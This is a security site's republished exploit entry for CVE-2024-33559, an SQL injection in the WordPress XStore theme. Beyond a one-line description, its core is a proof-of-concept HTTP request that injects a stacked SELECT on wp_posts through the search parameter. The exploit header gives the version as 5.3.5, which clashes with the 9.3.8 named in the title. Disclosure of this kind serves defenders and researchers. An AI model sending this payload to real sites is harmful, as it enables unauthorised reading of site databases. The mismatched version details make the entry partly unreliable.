Home Tools Exploits & CVE's WordPress XStore Theme 9.3.8 SQL Injection

WordPress XStore Theme 9.3.8 SQL Injection

May 22, 2024

107

WordPress XStore theme version 9.3.8 suffers from a remote SQL injection vulnerability.

advisories | CVE-2024-33559

# Exploit Title: WordPress Theme XStore 9.3.8 - SQLi
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Version: 5.3.5
# Tested on: Windows10
# CVE: CVE-2024-33559


Poc
<https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc>

POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1

WordPress XStore Theme 9.3.8 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Lost And Found Information System 1.0 SQL Injection

Lost And Found Information System 1.0 Cross Site Scripting

Cacti Import Packages Remote Code Execution

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

WordPress Real Estate 7 Theme 3.3.4 Cross Site Request Forgery

Trojan-Spy.Win32.Stealer.osh Insecure Permissions

Anuranan SBAdmin 2 Insecure Settings